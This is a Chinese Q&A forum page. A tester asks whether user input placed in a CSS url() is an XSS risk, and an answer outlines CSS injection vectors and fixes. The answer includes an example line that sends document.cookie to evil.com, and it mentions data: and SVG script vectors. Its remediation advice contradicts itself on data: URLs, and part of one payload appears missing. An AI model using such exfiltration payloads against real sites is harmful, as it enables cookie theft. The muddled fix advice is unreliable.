白盒测试时如何判断CSS会不会引发安全问题?
最近在做Web安全的白盒测试,看到项目里有一段动态生成的CSS,担心会不会有XSS风险。虽然CSS本身不能执行JS,但听说某些属性比如url()或者@import可能被利用,是不是真的?
比如下面这段代码,用户输入的内容会拼接到background-image里:
.user-card {
background-image: url("{{ userAvatarUrl }}");
border: 1px solid #ccc;
padding: 10px;
}
我试过把{{ userAvatarUrl }}替换成javascript:alert(1),浏览器好像没执行,但不确定是不是所有情况都安全。这种写法到底算不算漏洞?需要转义吗?
- 2
回答
37浏览
前端代码审查时如何判断CSS是否存在安全风险?
最近在做Web安全Code Review,看到团队有人写了下面这段CSS,我不确定会不会有安全隐患。CSS一般不执行逻辑,但听说某些写法可能被用来做信息探测或者配合XSS攻击? .user-card ...
- 1
回答
5浏览
前端项目里引入的第三方CSS库会不会带来供应链安全风险?
最近在用一个开源的UI组件库,直接通过CDN引入了它的CSS文件,但听说依赖外部资源可能有安全问题。比如会不会被注入恶意样式或者重定向到钓鱼页面?我试过本地托管,但更新太麻烦。 下面是我现在用的那段C...
- 1
回答
32浏览
前端渗透测试中如何防范CSS注入攻击?
我在做安全测试时,发现用户输入的样式能直接渲染到页面上,担心有CSS注入风险。比如下面这段动态生成的CSS: .user-style { background: url(' + userInput +...
- 1
回答
24浏览
前端开发中如何通过安全培训避免CSS注入风险?
最近公司开始推行安全开发生命周期(SDL),要求我们前端也参加安全培训。但我有点困惑:CSS 也会有安全问题吗?我之前写过类似下面的动态样式,会不会有风险? .user-theme { backgro...
- 1
回答
41浏览
E2E测试中如何正确等待动态加载的CSS动画元素?
我用Cypress写E2E测试时,有个按钮点击后会通过CSS动画淡入一个提示框,但测试经常因为元素还没完全显示就断言失败。我已经试过cy.wait()和cy.get().should('be.visi...
- 2
回答
19浏览
前端安全审计时如何防止CSS注入风险?
最近在做项目的安全审计,发现有个用户自定义主题的功能,允许传入CSS字符串动态应用样式。我担心这里会有CSS注入漏洞,比如用户输入恶意代码破坏页面或窃取数据。虽然我用了DOMPurify处理HTML,...
- 2
回答
37浏览
前端安全审计中如何评估CSS注入风险?
最近在做项目安全自查,发现用户能自定义主题色,但担心CSS注入问题。我用了类似下面的写法,这样安全吗? .user-theme { --primary-color: ${userInput}; bac...
- 2
回答
33浏览
前端安全审计时怎么判断CSS有没有安全风险?
最近在做项目的安全审计,听说CSS也可能有安全问题,比如XSS之类的。但我一直以为CSS是静态样式,不会执行代码,所以有点懵。 我试过用一些在线工具扫描,但没报错。不过我们有个动态加载用户自定义主题的...
- 2
回答
29浏览
白盒测试时发现CSS注入漏洞,如何验证并修复?
在审计前端代码时发现一个动态插入用户CSS样式的功能,像这样: .example { content: attr(data-style); /* 用户提供的样式会直接填充到data-style属性 *...
- 2
回答
45浏览
前端代码审查时如何发现CSS注入风险?
最近在做安全Code Review,看到一段动态拼接CSS的逻辑,担心有注入漏洞。比如用户输入直接插进style标签里,会不会被利用? 我查了资料说CSS本身不像JS那样能执行脚本,但某些属性比如ur...
先说你的场景
background-image的url()里用javascript:伪协议,在Chrome、Firefox、Safari里都翻不起浪。但你得确认一件事——用户输入的内容是不是真的只在这个url()里面?有没有可能突破出去跑到HTML里?
如果{{ userAvatarUrl }}没被正确转义,用户输入
">这种东西,假设它被直接插到HTML属性里,那就真中奖了。CSS注入的几种玩法
expression()和behavior这种IE老黄历不提了,现在主要防几个:
一是CSS变量渗透。如果你的CSS用了var(--xxx)这种变量,用户输入
--color: red; background: url(http://evil.com/?data=${document.cookie})这种,能把你整个页面的CSS变量污染个遍,虽然不能直接执行JS,但可以偷数据搞侧信道攻击。二是data:协议。用户如果能控制url()内容,弄个
data:text/html,进去,在某些老版本浏览器或者特定上下文里可能翻车。三是SVG搞事情。如果CSS背景图指向SVG文件,SVG里可以内嵌script标签,这个是真实存在过的漏洞。
怎么修
最靠谱的做法是对用户输入做URL协议白名单,只允许http、https、data(谨慎),把javascript:、data:这种直接拉黑。输出到CSS之前做URL编码,特别是引号和括号这些敏感字符。
如果用WordPress的话,esc_url()这个函数可以看看,它会帮你过滤掉危险协议。不过最关键的还是确认你的模板引擎到底是怎么输出这个变量的——是直接拼接还是用了转义函数,这个才是决定性的。